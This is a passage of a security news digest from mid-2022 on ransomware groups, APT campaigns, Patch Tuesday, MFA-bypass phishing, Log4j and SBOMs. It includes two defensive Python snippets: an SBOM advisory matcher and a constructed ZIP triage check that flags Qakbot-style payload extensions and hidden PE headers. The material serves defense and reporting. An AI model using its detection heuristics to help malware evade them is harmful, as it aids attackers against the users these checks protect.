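    return compare_versions(version, introduced) >= 0 and compare_versions(version, fixed) < 0


def component_identity(component):
    """Use the package URL minus its @version as the identity; fall back to
    group/name for components that carry no purl."""
    purl = component.get("purl")
    if purl and "@" in purl:
        package, version = purl.rsplit("@", 1)
        return package, version
    group = component.get("group")
    name = component["name"]
    return (f"{group}/{name}" if group else name), component.get("version", "")


def iter_components(components):
    """Walk the component tree depth-first, since CycloneDX allows nesting."""
    for comp in components:
        yield comp
        yield from iter_components(comp.get("components", []))


def find_affected(sbom, advisories):
    """One finding per (component, advisory) pair whose version is in range."""
    findings = []
    for comp in iter_components(sbom.get("components", [])):
        package, version = component_identity(comp)
        if not version:
            continue
        for adv in advisories:
            if adv["package"] == package and is_affected(version, adv["introduced"], adv["fixed"]):
                findings.append({"advisory": adv["id"], "package": package,
                                 "version": version, "fixed_in": adv["fixed"]})
    return findings


def scan_sample():
    """Run the check over the constructed SBOM above."""
    return find_affected(json.loads(SBOM_JSON), ADVISORIES)


if __name__ == "__main__":
    for hit in scan_sample():
        print(f"{hit['package']}@{hit['version']}: {hit['advisory']}, fixed in {hit['fixed_in']}")
```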

DoT comes to Windows

Support for the DoT (DNS-over-TLS) protocol is now available for Windows Insiders users, Microsoft said this week.

QWACs are bad, mkay

Mozilla has launched a public campaign to raise awareness of the EU’s terrible plan to force browser vendors to support Qualified Website Authentication Certificates (QWACs), a new type of digital certificate. Mozilla, academics, and security experts say that QWACs are similar to Extended Validation certificates that browser makers have stopped supporting because of their lack of actual security benefits. But more importantly, Mozilla says that an EU regulatory body should not be telling browser makers what technical solutions to support, especially since their idea is actually a step back for user security and only a money-grab for certificate authorities (CAs).

Russia looking to impose fines for data breaches

The Russian government is working on a law that will impose turnover-based fines on companies that suffer data breaches that expose personal user information, according to a report from the Russian Legal Information Agency. Currently, legal entities face fines of 500,000 rubles (~$8,500) for the leak of personal data, but if the new proposed bill passes, fines will be calculated as a percentage of a company’s revenue.

First DHS Cyber Safety Review Board report

In its first-ever report, published on Thursday, the DHS Cyber Safety Review Board concluded that the Log4j vulnerability disclosed last year would pose issues for US organizations for years to come. To deal with this problem, the board issued 19 recommendations, such as the implementation of software bill of materials (SBOM) schemes and increased investment in open-source programs, which form the core of many government and private sector networks. [Additional coverage in The Record and in Dmitri Alperovitch’s Twitter thread below]

US senators propose crackdown on shady VPNs

Two Democratic senators have asked the FTC to look into the deceptive practices of VPN companies. The two want the FTC to look at how VPN companies use false or misleading claims about user anonymity in their ads, the sale of user traffic data to third parties, and whether the companies disclose when they share user data with law enforcement agencies.

Iran puts the entire country in Safe Search mode

Several Iranian users reported on Wednesday that Iranian internet service providers started replying to DNS queries for the main Google.com domain with the Lock SafeSearch URL of forcesafesearch.google.com. This is a known feature of the Google search engine that’s usually employed in controlled corporate environments, where companies prevent users from searching for inappropriate content. Apparently, this is also the second time the Iranian government has done this.

KillNet

Intel471 has a report out on the operations of pro-Russian hacktivist group KillNet and its recruitment, tactics, techniques, and procedures.

GhostSec

On the same note, CyberInt published a report on GhostSec, a hacktivist group founded back in 2015, which joined the “Russo-Ukrainian hacktivist war” on the side of Ukraine.

Infostealer market overview

Threat intel company KELA has published an overview of the current underground market for infostealer malware and its top players, like Redline, Raccoon, AZORult, Mars, BlackGuard, META, Arkei, Vidar, Ginzo, Eternity, 7.62mm, Inno, TigersTeam, and the Aurora Project.

Distribution of bots for sale on Russian Market, January 2022 to July 2022, by stealer, as collected by KELA’s systems.

Unity merges with adware maker

Apparently, Unity for Games decided to merge with a company accused of spreading adware.

WPBakery attacks

WordPress security firm Wordfence reported on Wednesday seeing a sudden spike in attacks targeting a vulnerability (CVE-2021-24284) in Kaswara Modern WPBakery Page Builder Addons, a page builder plugin for WordPress sites from WP developer WPBakery. The vulnerability, which has not been patched, can be used to upload malicious PHP files to an affected website, leading to code execution and complete site takeover.

Mantis DDoS botnet

Cloudflare said that a botnet named Mantis was responsible for the record-breaking DDoS attack that hit its servers last month. Cloudflare says the Mantis botnet is an evolution of the older Meris botnet, but unlike its predecessor, Mantis can infect a wider range of devices, not just MikroTik routers. The company estimated the current size of the Mantis botnet at only 5,000 bots, meaning the botnet can pack a strong punch even from a small base, hence the name, after the mantis shrimp, which also generates a lot of power from its tiny frame to spear its prey.

New Autolycos malware

Evina security researcher Maxime Ingrao discovered this week eight applications uploaded on the official Google Play Store that contained a new Android malware strain named Autolycos. Ingrao said the apps were downloaded more than 3 million times and that Autolycos’ main purpose was to secretly subscribe infected users to various premium services and generate a profit for the threat actor through an affiliate kickback scheme. According to Evina, the malware family originated in South Africa and is now proliferating in Nigeria.

North Korean hackers linked to H0lyGh0st ransomware

Microsoft said that it found evidence to link the operators of the H0lyGh0st (HolyGhost) ransomware to a group of North Korean hackers it tracks as DEV-0530, which may be connected to a larger group known as the Andariel APT (PLUTONIUM, DarkSeoul). Microsoft said it saw the group deploy its payload on the networks of small businesses in multiple countries since June 2021. This is not the first time North Korean hackers have been linked to ransomware operations; they have previously been linked to strains like WannaCry, VHD, Tflower, BEAF, PXJ, ZZZZ, CHiCHi, and Maui.

Lockbit dominates Q2 2022

According to reports from both CyberInt and Digital Shadows, the Lockbit gang was the most active ransomware group in Q2 2022.

Top active groups per Quarter, with overall Q1 vs Q2 comparison.

Vice Society group

Sekoia’s threat intel team has published a report on Vice Society, a cybercrime group that deploys ransomware created by other groups (such as Zeppelin and HelloKitty) but uses its own leak site to extort victims. Sekoia said that based on its analysis, it believes the group’s members are “English native speakers.”

BlueSky ransomware

CloudSEK researchers have published some initial details and IOCs on the new BlueSky ransomware, first spotted this year in May and believed to be connected to the former Conti gang. CloudSEK also said it believes it has tracked down the ransomware’s operator to someone located in Krasnodar, Russia.

Use of cryptocurrency mixers rose in 2022

Blockchain tracking company Chainalysis said that cryptocurrency mixing services saw a huge spike in usage this year as cybercrime and nation-state groups have extensively used them to launder ill-gotten funds.

Illicit addresses account for 23% of funds sent to mixers so far in 2022, up from 12% in 2021.

CERT-FR MISP feed

The CERT France team has released a free public MISP feed of indicators of compromise (IOC) labeled TLP:WHITE for unrestricted distribution.

Qakbot evolves

Security researchers from Zscaler said in a report this week that the rising number of infections seen in recent months from the Qakbot (QBot, QuackBot, Pinkslipbot) botnet can be traced back to the deployment of several new detection evasion techniques. These include the use of ZIP files to hide payloads, new code obfuscation methods, and the use of uncommon file extensions (OCX, ooccxx, dat, or gyp) to deliver payloads.
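An added example (not from the newsletter or from Zscaler’s report) of a defender-side triage check for the delivery tricks described above: it opens a ZIP attachment and flags members that are encrypted (content not inspectable), that use one of the reported extensions, or whose content starts with a PE header under an extension that should not carry one. The archive and its contents are constructed in memory; the fake PE bytes are header stubs, not a real executable.

```python
import io
import zipfile

# Extensions the item above reports Qakbot using for payloads.
QAKBOT_REPORTED_EXTENSIONS = {"ocx", "ooccxx", "dat", "gyp"}
# Extensions under which a PE ("MZ") header is expected rather than suspicious.
PE_EXTENSIONS = {"exe", "dll", "ocx", "sys", "scr", "cpl"}
PE_MAGIC = b"MZ"


def member_extension(name):
    """Lower-case extension of the member's base name ('' if it has none)."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def inspect_zip(data):
    """Return a finding for every member that is encrypted, carries a reported
    extension, or hides a PE header under an extension that should not be PE.
    The extension rule alone is noisy (.dat is common); a PE header under .dat
    is the strong signal, so both reasons are recorded separately."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext = member_extension(info.filename)
            reasons = []
            # General-purpose flag bit 0 marks an encrypted member; reading it
            # without a password raises, so record that instead of the content.
            if info.flag_bits & 0x1:
                head = b""
                reasons.append("encrypted member, content not inspectable")
            else:
                with zf.open(info) as fh:
                    head = fh.read(len(PE_MAGIC))
            if ext in QAKBOT_REPORTED_EXTENSIONS:
                reasons.append(f"extension .{ext} reported in Qakbot deliveries")
            if head == PE_MAGIC and ext not in PE_EXTENSIONS:
                reasons.append("PE header under non-executable extension")
            if reasons:
                findings.append({"name": info.filename, "extension": ext,
                                 "is_pe": head == PE_MAGIC, "reasons": reasons})
    return findings


def build_sample_archive():
    """Constructed archive: two fake PE images under odd extensions, a
    reported extension on plain text, and a benign text file."""
    fake_pe = PE_MAGIC + b"\x90" * 62 + b"PE\x00\x00"  # DOS stub + PE signature only
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.ooccxx", fake_pe)
        zf.writestr("chart.dat", fake_pe)
        zf.writestr("notes.gyp", b"{ 'targets': [] }")
        zf.writestr("readme.txt", b"Please open the attached document.")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in inspect_zip(build_sample_archive()):
        print(f"{finding['name']}: {'; '.join(finding['reasons'])}")
```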

Backdoorit & Caligula

The Avast team published a report on the Backdoorit RAT and the Caligula IRC DDoS bot, both malware strains written in the Go programming language.

Mysterious campaign

Trellix has a report out on a threat actor malspam campaign targeting government agencies of Afghanistan, India, Italy, Poland, and the US since 2021. The final payload in these attacks is either AsyncRAT or LimeRAT. According to clues left by the attacker, Trellix believes the threat actor may be from South Africa.

Confucius APT

Chinese infosec firm Antiy Group has published a report on a recent campaign of the Confucius APT that targeted Pakistani government and military institutions. Past reporting has found links between Confucius and Patchwork, a well-known Indian threat actor. Some insights from one of Trend Micro’s APT experts.

Sidewinder compromises Pakistani Air Force

On a similar note, Check Point said it had “evidence suggesting that Pakistan Air Force’s Headquarters was a victim of a successful attack conducted by Sidewinder, a suspected India-based APT group.” The compromise allegedly took place in May 2022, according to the security firm.

Transparent Tribe

On the other side, Cisco Talos also published a report on recent attacks carried out by Transparent Tribe, a Pakistani APT that has been targeting Indian educational institutions, showing that these two countries continue to hack each other with no respite.

macOS sandbox vulnerability

After releasing its own security updates on Patch Tuesday, Microsoft also took great care to disclose a vulnerability in Apple’s macOS that could be exploited to escape the App Sandbox service and run malicious code on a system. While the bug (CVE-2022-26706) was fixed in May, Microsoft’s team published a technical report on it yesterday.

70+ Lenovo laptop models impacted by UEFI firmware bugs

ESET security researcher Martin Smolar has discovered three buffer overflow vulnerabilities in the UEFI firmware of Lenovo Notebook devices. The vulnerabilities allow threat actors to hijack the boot sequence and take over the device’s OS. More than 70 Lenovo models are impacted, and the Chinese vendor released patches this week.

New browser side-channel attack

A team of academics from the New Jersey Institute of Technology published details this week about a new deanonymization attack that targets web browsers and can disclose past sites a user has visited. The gist of the research is that a threat actor who manages to lure a victim to a malicious site can link their IP address with details such as usernames or emails used on popular websites the victims are currently still logged in to. The research team said the attack works because the researchers pull data from the user’s CPU cache and not the browser cache, and by doing so, they bypass many browser-level isolation mechanisms, including cross-origin resource policies (CORP), cross-origin opener policies (COOP), and SameSite cookie attributes. The NJIT team said they tested the attack on both desktop and mobile browsers running on various CPU microarchitectures (Intel, Apple M1, Qualcomm CPUs), operating systems (Windows, macOS, Android), different browser engines (Chrome, Safari, Firefox, Tor Browser), and with multiple services (Google, Twitter, LinkedIn, TikTok, Facebook, Instagram, Reddit).

RCE in Blitz.js

SonarSource researchers published a write-up for CVE-2022-23631, a prototype pollution vulnerability in the Blitz.js JavaScript framework that can lead to remote code execution.

Decade in vulnerabilities

A Trustwave report looks at the top 10 worst vulnerabilities from the last decade, including the likes of BlueKeep, Heartbleed, EternalBlue, and others.

Honda to redesign cars to address Rolling PWN

Japanese carmaker Honda said it plans to redesign the key fob technology in its new vehicles to address a recently-discovered vulnerability known as Rolling PWN. Disclosed last week, the vulnerability can be used to unlock and start the engines of all Honda cars made since 2012.

ATT&CKcon 3.0

The recorded presentations from the ATT&CKcon 3.0 security conference are now available online.

New tool

German security firm RedTeam Pentesting has open-sourced and released Pretender, a cross-platform tool for executing machine-in-the-middle (MitM) attacks inside Windows networks.

Web tool launch

BinaryNinja launched this week Decompiler Explorer, a web service that lets you compare the output of different decompilers on small executables.

Amazon Acknowledges Sharing Ring Data With Police Without Informing Users

Amazon has provided US law enforcement agencies with data from Ring video doorbells nearly a dozen times since the start of 2022. While Amazon’s policy states that police may not view recordings without the explicit permission of the devices’ owners, that policy is superseded by subpoenas and emergency requests. Amazon confirmed that they had shared Ring footage in a letter responding to questions posed by US Senator Ed Markey (D-Massachusetts).

Note

  • Amazon’s response to the Senator shows Amazon has evolved to a balanced response between user demands for privacy and law enforcement (and often user) demands for using stored doorbell video to catch thieves and criminals. Worth showing your Chief Legal Counsel if your company provides any product or service storing such data. From a Work at Home security viewpoint, Amazon Ring is the largest vendor but only has about a 15% market share. The top 5 vendors overall only represent 30% of the market – 70% of devices are sold by dozens of tiny vendors who are likely not being as diligent as Amazon. The good news from a WAH point of view is many of the smaller ones don’t offer long cloud storage of video/audio, but most will over time. WAH security awareness should include tips on how employees can minimize risk.
  • Make sure that you understand who can view your doorbell or other security footage, and under what conditions. And this reminds us that they have direct access to the data to override those processes if needed. Amazon has their Neighbors Public Safety Service which allows users to elect to share footage with law enforcement as well as a process where they will share footage in response to a court order or emergency request. In this instance, Amazon (Ring) made a good faith determination that sharing the footage was warranted, but those requests cannot be linked to a court or emergency order. If you’re uncomfortable, consider solutions where the footage is stored locally and only you have access to view it.
  • Police and other government agencies will always look to gather whatever data they can when investigating crimes or individuals. That is why strong privacy laws are so important to ensure that any such access is provided in a controlled, informed, and transparent manner and it is beyond time that the US introduced strong federal privacy laws. Privacy laws are not there to hinder police or government agencies, they are there to protect the human rights of us all.
  • Their “terms of service” almost universally permit holders of data to respond to “lawful” requests, i.e. warrants and subpoenas. If that is a problem for you, then do not share the data. Holders of data should be transparent about the number of such requests they receive and how they responded. Such transparency is essential to maintaining the necessary level of public trust.

US Cyber Safety Review Board: Log4j Will be an Issue for Years to Come

The US Department of Homeland Security’s (DHS) Cyber Safety Review Board (CSRB) has determined that the Log4j vulnerabilities are going to pose a risk for at least a decade. CSRB’s report, Review of the December 2021 Log4j Event, includes recommendations for users to help mitigate the risks.

Note

  • Log4j is a bit of a tricky vulnerability. Initially, we saw a big surge in scans for the vulnerability and these scans dropped off quickly as attackers realized that the standard attack tools only worked for a few specific applications. In many cases attacks against log4j need to be customized for a particular application based on how and where it uses log4j. But the application is still vulnerable and as more specific exploits are released for these use cases, we will see new flare ups.
  • The good news quote in the CSRB’s first report since being established: “At the time of writing, the Board is not aware of any significant Log4j-based attacks on critical infrastructure systems. Somewhat surprisingly, the Board also found that to date, generally speaking, exploitation of Log4j occurred at lower levels than many experts predicted, given the severity of the vulnerability.” This first output from the CSRB was focused on a vulnerability vs. an incident. The idea of a Cyber Safety Review Board came from trying to get similar “lessons learned” that have for years come from the US National Transportation Safety Board that investigates plane, train, vehicle, etc. crashes. The “Organizational Responses” section of this initial report is just a few paragraphs of lessons learned. The Enterprise Risk Management recommendations section has a bit more, but at a much higher level. I’d like to see the next CSRB report focus on an investigation of one of the continuing stream of successful attacks we are always commenting on in NewsBites.
  • As we are still having breaches due to SQL injection and other vulnerabilities identified decades ago, I have no doubt that we will still be dealing with recently discovered vulnerabilities for decades to come, and yes, I won’t be surprised to still see SQL injection attacks over the coming decades. Security engineering needs to become the default for all systems and applications from their very beginning and not something added on as a nice to have or to keep regulators happy.
  • The first task on the CSRB agenda was a report on Log4J. The executive summary includes a number of recommendations which apply to more than just Log4j, even if you’re not developing applications, to include being aware of the components you’re integrating, keeping good software inventories so you know where those components are located. SBOMs are a step to aid this: remember that they represent a point-in-time, so make sure they are maintained/updated.

Phishing Campaign Bypasses MFA

Researchers from Microsoft have discovered a phishing campaign that can bypass multi-factor authentication (MFA). The attacks are targeting Office 365 users; more than 10,000 organizations have been targeted since September 2021. Microsoft says the campaign uses adversary-in-the-middle phishing sites to steal passwords, hijack sign-in sessions, and bypass the authentication process.

Note

  • At the SANS New Threats and Attacks keynote presentation at the RSA Conference, SANS instructor Katie Nickels covered MFA Bypass attacks but also said “Multifactor auth remains an incredibly powerful force for security. You should still use it.” Successful attacks (like airplane crashes) make the headlines, blocked attacks (like safe plane landings) do not – you will not see publicity around the 99.9% of credential stealing attacks that don’t work if MFA is done right. MFA does have to be done right, Katie points that out, and even done right doesn’t mean the end of successful attacks. But raising the bar against credential stealing that takes advantage of reusable passwords is mandatory if you are even talking about achieving anything close to “zero trust.”
  • The attack isn’t particularly new, but the write up does also cover what attackers are doing after the phishing is successful. Good read and maybe a motivation to not allow “remember browser” cookies to bypass MFA for critical applications.
  • Just to clarify, ‘adversary-in-the-middle’ attacks have been going on for almost twenty years now, nothing new. Second, this is not an attack specifically against MFA. In this version, the attackers’ goal is to steal the session-cookie, not the actual authentication credentials. In other words, the attackers wait for / assist you to authenticate first, steal the authenticated session cookie and then replay that to gain access. A similar attack happens with “trojaned” M365 plugins that you approve and install AFTER authenticating to your M365 account. Strong authentication mechanisms like MFA are highly effective, something I still strongly recommend and use actively for my own personal accounts. The Microsoft post has good details about how the attack works and mitigation steps.
  • While we have been raising the bar by implementing some form, any form, of MFA, attackers have been working on how to exploit these efforts. You should be starting to hear the term phishing-resistant MFA. These leverage both cryptographic (public-private key pairs) as well as verification the requesting site is genuine. FIDO2 is one example. From an infrastructure perspective, pursue a strategic roadmap from your current MFA to phishing resistant MFA, while taking tactical steps to phase out SMS or phone call MFA quickly. From an end-user perspective, continue to educate them on being skeptical and checking that the site they are interacting with is truly genuine.
  • MFA has raised the bar for criminals to hijack user accounts but it should not be seen by itself to be a panacea. Other mitigations should be put in place to reinforce the protection offered by MFA solutions. The Microsoft blog included in the links to this story offers some very good additional mitigation steps to help defend against this type of attack.
  • Unlike the fraudulent re-use of passwords, which is cheap and enables session creation, attacks against strong authentication are expensive and only enable session stealing. We must not permit the limitations of a security mechanism to discourage its use, the perfect to be the enemy of the good.

Lenovo Releases Firmware Updates to Fix RCE Flaws

Three vulnerabilities in UEFI (Unified Extensible Firmware Interface) firmware affect more than 70 models of Lenovo laptops. All three vulnerabilities are buffer overflow flaws that could be exploited to allow arbitrary code execution. Lenovo has made firmware updates available.

Note

  • The Lenovo site includes a table of models and which of the three vulnerabilities impact them. All 70 are impacted by CVE-2022-1892, a buffer overflow in the SystemBootManagerDxe driver. The fix, in all cases, is to update your firmware. In April Lenovo addressed three UEFI vulnerabilities with firmware updates. It’s a good time to make sure your entire fleet of Lenovo systems are running updated firmware.

CISA Adds Another Flaw to Known Exploited Vulnerabilities Catalog

The US Cybersecurity and Infrastructure Security Agency (CISA) has added another vulnerability to its Known Exploited Vulnerabilities Catalog. The local privilege elevation vulnerability affects Microsoft Windows Client Server Runtime Subsystem (CSRSS). The flaw was fixed in Microsoft’s July Patch Tuesday earlier this week. Federal agencies have until August 2 to mitigate the vulnerability.

Note

  • The good news is the fix is in the July patch bundle. The bad news is this impacts client and server operating systems, through Windows 11/Server 2022, and is a zero-day to boot. While you’re already pushing out your client updates, you’re going to want to expedite your regression testing for server deployment.

Microsoft Patch Tuesday

On Tuesday, July 12, Microsoft released fixes for more than 80 vulnerabilities. Four of the flaws are rated critical; one is being actively exploited. The zero-day privilege elevation flaw in Windows’ Client Server Runtime Subsystem (CSRSS) affects all supported versions of Windows. CISA has added the CSRSS flaw to its Known Exploited Vulnerabilities catalog.

Note

  • Overall, a pretty “average” patch Tuesday. The CSRSS vulnerability is already exploited, but it is “only” a privilege escalation vulnerability, so nothing to lose too much sleep over. Also note that Microsoft did release the new auto-patch in general release now. Maybe start experimenting with it to take the busy work out of patch Tuesday.
  • While it sometimes feels we can’t catch a break, it’s nice to see a fix released for all impacted platforms rather than having to wait for patches for different OS versions. The CSRSS vulnerability is a zero-day and allows an attacker to execute code as System. Note this update also includes another round of patches for the print spooler (CVE-2022-22022, CVE-2022-22041, CVE-2022-30206, and CVE-2022-30226) which can be leveraged to delete files or gain System privileges.

Retbleed Speculative Execution Attack

Researchers from ETH Zurich have discovered a speculative execution attack that affects certain Intel and AMD processors. The attack could leak sensitive data. Dubbed Retbleed, the attack bypasses the retpoline software defense, which was introduced in 2018 to mitigate speculative execution attacks. The researchers will present their paper at the Usenix conference in August.

Note

  • Spectre variant 2 is back – while it was argued that the retpoline mitigation to that attack was insufficient, it was countered that those attacks were impractical. This is that impractical attack. The good news is there are mitigations, and Windows systems are not vulnerable as they are by default using Indirect Branch Restricted Speculation. Mitigations for other operating systems come at a 12-28% overhead so research carefully before deploying.

macOS App Sandbox Escape Flaw

A vulnerability in macOS could be exploited to bypass the operating system’s App Sandbox. Apple fixed the flaw in a security update on May 1. Microsoft detected the vulnerability while looking for ways to run malicious macros in Office docs on macOS; they notified Apple in October 2021. Microsoft has released proof-of-concept exploit code for the flaw.

Note

  • You’re not still treating your Macs as non-targeted are you? While we can chuckle about Microsoft finding a flaw in macOS, we need to quickly acknowledge that disclosure to Apple was made and fixes incorporated in the May 16 updates to Catalina, Big Sur and Monterey. Make sure those updates have been deployed, particularly as it’s going to get busy with iOS 15.6 likely next week and Ventura/iOS 16 in a couple of months.
  • So called “proof-of-concept” code should not be released; it lowers the cost of attack to the rogues. I, for one, am more than willing to take Microsoft’s word that there is a vulnerability, that it can be exploited, and should be mitigated. Microsoft should not lower the cost of attack against vulnerabilities in its competitors’ products. Rather it should focus on putting its own house in order.

Tenet Healthcare Sued Over Data Theft

Tenet Healthcare and its Baptist Health System (BHS) affiliate are facing a $1M class action lawsuit over a cyberattack that led to patient data theft. The incident affected 1.2 million patients. The lawsuit alleges that the stolen data were not encrypted and that “BHS and its employees failed to properly monitor the computer network and IT systems that housed the private information.”

Note

  • The claim is hitting both on timely notification and encryption of sensitive data. HIPAA allows data to not be encrypted at rest if you have other mitigations; it will be interesting to see how this plays against that plan. Make sure that you’re prepared to notify users and/or partners in a timely fashion in the event of a breach. Take a moment to review contractual or regulatory requirements to make sure that you’re meeting those obligations. As to encryption, it’s become increasingly easy to encrypt at rest and in transit; make sure that you’ve not overlooked options, not previously available, to facilitate this, particularly for services you migrated to the cloud. Then document and track gaps.
  • These class action lawsuits after breaches have been tried many times over the past 10 years and they rarely seem to succeed. That may change in the future as the broad loopholes in regulations get narrowed at the state level, but I think today it is more important to convince CXOs and Boards that the cost of preventing or minimizing the damage from breaches is almost invariably less than incurring a breach – and cybersecurity insurance rarely changes that.

Read more in

Microsoft’s security update includes 84 vulnerabilities, one that’s exploited in the wild

Microsoft released its monthly security update Tuesday, disclosing more than 80 vulnerabilities in the company’s various software, hardware and firmware offerings, including one that’s actively being exploited in the wild. July’s security update features three critical vulnerabilities, up from one last month, still lower than Microsoft’s average in a Patch Tuesday. All the other vulnerabilities fixed are considered “important.” All three critical vulnerabilities allow remote code execution on Microsoft Windows Systems. Of these, Microsoft considers the exploitation of CVE-2022-22029, CVE-2022-22038 and CVE-2022-22039 less likely to occur. CVE-2022-22029 could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS). However, according to Microsoft, it has high attack complexity and would require repeated exploitation attempts through sending constant or intermittent data. Another critical vulnerability, CVE-2022-22038, is also considered to be more difficult to exploit because it requires undisclosed additional actions by an attacker to prepare the target environment for exploitation. CVE-2022-22039 is another remote code execution flaw in Windows Network File System that requires an attacker to win a race condition to exploit it, making this vulnerability less likely to be exploited. Read more: Microsoft Patch Tuesday for July 2022 — Snort rules and prominent vulnerabilities

Adobe discloses critical vulnerabilities in Acrobat, Reader and Photoshop

Adobe released a large swath of patches for its products Tuesday, including disclosing 22 vulnerabilities in Adobe Acrobat Reader, some of which could lead to arbitrary code execution. Affected product versions include Acrobat DC, Acrobat Reader DC, Acrobat 2020, Acrobat 2017 and Acrobat Reader 2017. Cisco Talos discovered one of the vulnerabilities, CVE-2022-34230, a use-after-free issue that is triggered if the targeted user opens a PDF with specially crafted, malicious JavaScript. The code could give attackers control over reused memory, which can lead to arbitrary code execution. Read more: Adobe Patch Tuesday: Critical Flaws in Acrobat, Reader, Photoshop

Ransomware Payment Recovery Does Not Cover Costs of Attack

Maastricht University in the Netherlands has recovered cryptocurrency it paid after a ransomware attack in 2019. The 30 bitcoin payment, worth €200,000 in 2019, is now worth €500,000. Maastricht University says the net gain of €300,000 does not cover the costs associated with the attack.

Note

  • The obvious reaction from most NewsBites readers is, of course, “No Duh” or whatever the 2022 equivalent of that is. But, important to get across to management that no insurance payment, let alone any recovery of damages through legal means, ever covers the full cost of an incident and more importantly: the cost of avoiding most incidents is almost always less than the cost of suffering the incident.
  • The volatility of cryptocurrency worked in their favor this time. While it’s awesome to recover the payment, and I would jump on it if the opportunity presented itself, don’t assume recovering the ransom, including any increase in value, will come close to covering costs incurred to recover from an attack, particularly as some decryption programs provided by the attackers don’t work leading to the most resource intensive recovery option.
  • This is an important point that organizations should take into consideration when facing ransomware extortions, the cost of recovery is not just the ransom demand. It can also include the costs of replacing compromised devices, updating systems, dealing with forensic and other investigations, and so on. (Disclaimer: I am a guest lecturer at Maastricht University but had no involvement with this incident.)

Read more in

PyPI Mandates Two-Factor Authentication

The Python Package Index (PyPI) repository has begun rolling out a two-factor authentication (2FA) requirement for critical projects. Google’s Open Source Security Team has provided 4,000 Titan security keys to be given to eligible maintainers.

Note

  • The push-back from developers is interesting, and a good lesson for anybody rolling out 2FA in larger organizations. Developers contributing to PyPI are probably less likely to experience technical issues implementing 2FA than most organizations, and these developers are likely more aware than most about some of the issues with password-based authentication. But still, the extra complexity of 2FA was enough for some of them to rebel/refuse to participate.
  • It’s 2022. How have the other library management systems survived this long without requiring multi-factor? Having not been extremely into every library management system like this, it does make you question what the other managers are doing. Is this an oversight? Have threat actors been in these systems for years without tipping us off?
  • Good to see all the momentum and minimal (but not zero) pushback for stronger authentication in the software supply chain. Now is a good time to do a prototype test of 2FA within your organization, maybe just the security group and some security friendly IT admins. Find the trouble areas (there will be some) and develop, and get approved, plans for some level of 2023 rollout.
  • Nice move to incentivize the adoption of 2FA! Before you get too excited, note that the Titan keys are only authorized in Austria, Belgium, Canada, France, Germany, Japan, Spain, Switzerland, United Kingdom, and the United States. Other areas need either a FIDO U2F key or 2FA enabled through a mobile app such as Google Authenticator, MS Authenticator, DUO Mobile, etc. Note that this simply prevents accounts being usurped by others; it doesn’t ensure the integrity of the users who have the 2FA tokens.

Read more in

Windows Autopatch is Now Available

Microsoft has made Windows Autopatch available for all users with Windows Enterprise E3 and E5 licenses. Autopatch will automate the updates for Windows 10, Windows 11, Microsoft Edge and Microsoft 365.

Note

  • Windows Autopatch is an interesting option for larger organizations to manage the risk of patching. Note that this is an option, and not replacing the patch Tuesday we know and love. But it offers for free what many organizations are already doing in some form.
  • Per many previous comments, try it out – most organizations will see minimal breakage and take one more step towards basic security hygiene.
  • I would like to say “Yay, this is great,” like Chrome Automatic Updates, but we have seen problematic patches in the past. Will we see an enterprise or two go down because of a botched patch like we saw when Antivirus vendors accidentally quarantine critical system services? Curious to see how this will go.
  • Make sure you understand how this applies to your business, as in what packages and license levels you need to enable the feature, and that it is available both as a service from Microsoft to manage systems on a customer’s behalf (Windows Autopatch) and as part of Windows Update for Business and the Windows Update for Business deployment services. Start with a test set of systems to determine the impact, versus your prior update mechanisms. Note that this is directed to end-users (commodity systems) rather than server systems, where application of the updates requires a much lower level of regression testing and has become SOP.

Read more in

HHS OCR Will Improve Breach Reporting Process

The US Department of Health and Human Services (HHS) Office of Civil Rights (OCR) has agreed to improve its communication with entities that report breaches. A recent report from the Government Accountability Office (GAO) recommended that HHS “establish a feedback mechanism to improve the effectiveness of its breach reporting process.”

Note

  • This is part of the bill coming due as the health care world has moved (sloowly) to depending on and starting to realize the benefits of electronic health records. The Healthcare Information Portability and Accountability Act (HIPAA) in 1996 resulted in breach notification regulations giving 60 days for notifying impacted parties and HHS, obviously too long – very manual processes evolved from that. Tighter requirements would have driven the need to move away from manual, paper bound breach notification processes at least as fast as electronic health records moved.
  • Whether you’re having vulnerabilities or breaches reported to you, timely response is required. Additionally, don’t just file the information; make sure it is acted upon by qualified and empowered people. Without an effective response, those reporting are unlikely to continue to do so and may choose other ways of handling the information which may be far less desirable.
  • In incident response one of the most important things you can do is to learn from your own incidents, one of the other important things you can do is to learn from others’ security incidents. Hopefully, the HHS will provide feedback to individual organizations and sanitized feedback to others so that all organizations can improve their security from lessons learnt.

Read more in

Microsoft Temporarily Rolls Back Macro Blocking

Microsoft has temporarily rolled back its decision to block VBA macros in Office documents downloaded from the Internet. Office has been warning users about macros for the past six years, giving users an option to enable them. Earlier this year, Microsoft announced that it would begin automatically blocking VBA macros by default; the feature went live in June.

Note

  • The change was likely rolled back due to unintended business process impact. No matter what the source, users need to be trained to think twice, pause, and think again, before enabling macros in an Office document. Organizationally you can roll out the Microsoft Office group policy objects and enable the “Block macros from running in Office files from the Internet” policy setting. Note that a document’s properties could then be updated (file, properties, and click unblock in the security section and hit apply) to remove the “mark of the web” and macros would then be enabled. Only do this for trusted content.
  • The amount of chatter on Twitter and other social media over this is rather interesting. Many pen-testers and red team individuals are cheering and jeering at Microsoft’s decision to roll back. Cheering as Macros will still be somewhat available over the Office Ecosystem and Jeering because Microsoft had a chance to remove this vulnerability by default. What this will ultimately mean will be difficult to figure out, other than the “status quo” from here on out for the foreseeable future.
  • Had to manage a similar problem in IBM some forty years ago. Changing the default (the right “security” decision) broke applications all around the world. One can only sympathize. Notice and publicity can only marginally mitigate the pain.

Read more in

GAO to US Department of Energy: Improve Grid Cybersecurity

In a recent report, the US Government Accountability Office (GAO) listed 26 priority recommendations for the Department of Energy (DoE). The recommendations fall into eight categories, including improving cybersecurity and electricity grid resilience.

Note

  • The three cybersecurity recommendations are pretty high level, mostly focusing on risk assessment and management. Missing two key things: giving priority to achieving basic security hygiene in existing energy infrastructure and building security into evolving energy sources that are more distributed than the traditional infrastructure.
  • Some of the recommendations, while timely, need funding to have the intended benefits, particularly for specialized areas where finding workers with relevant skills may be difficult without sufficient incentives.
